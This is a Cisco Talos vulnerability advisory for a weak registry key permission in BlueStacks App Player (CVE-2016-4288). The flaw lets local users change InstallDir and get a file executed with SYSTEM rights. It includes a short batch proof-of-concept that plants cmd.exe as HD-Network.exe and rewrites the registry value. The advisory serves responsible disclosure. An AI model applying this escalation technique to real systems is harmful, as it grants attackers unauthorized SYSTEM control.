Discovered by Marcin ‘Icewall’ Noga of Cisco Talos
Talos is releasing an advisory for a vulnerability in BlueStacks App Player. (TALOS-2016-0124/CVE-2016-4288). The BlueStacks App Player is designed to enable Android applications to run on Windows PCs and Macintosh computers. It’s commonly used to run popular Android games on these platforms.
Details A weak registry key permission vulnerability exists in the BlueStacks application. By default the BlueStack installer sets a weak permission to the registry key, which contains InstallDir reg value, this can be used later by the BlueStacks service component. This default configuration gives a malicious user the ability to modify this value, which can lead to privilege escalation.
Let’s examine the BlueStacks registry key where vulnerable "InstallDir" value is located:
As we can see the "Users" group has full access permissions to this key.
The BlueStacks service reads from this registry location to obtain the installation directory setting, and later attempts to run an executable (HD-Network.exe) from the location it receives. Setting the InstallDir value data on a user specified location, the malicious user can execute the chosen file with SYSTEM rights.
Exploit
@echo off
echo [+]Run cmd as SYSTEM
mkdir c:\TALOS
REM copy other files for execution
copy c:\windows\system32\cmd.exe HD-Network.exe
reg add "HKLM\SOFTWARE\BlueStacks" /f /v "InstallDir" /t REG_SZ /d c:\TALOS\
echo [+]Restore default values
Conclusion
Finding and responsibly disclosing zero-day vulnerabilities helps improve the overall security of the software people use on a day-to-day basis. Cisco Talos is committed to this effort by developing programmatic ways to identify vulnerabilities that could otherwise be exploited by malicious adversaries. This helps secure the platforms and software customers use and also helps provide insight into how Cisco can improve its own processes to develop better, more secure products.
Since this is a purely local vulnerability which involves no network traffic, Talos has not released any rules for this issue.
Timeline
2016-03-01 - Discovery
2016-04-13 - Reported
2016-08-04 - Patched
2016-08-04 - Released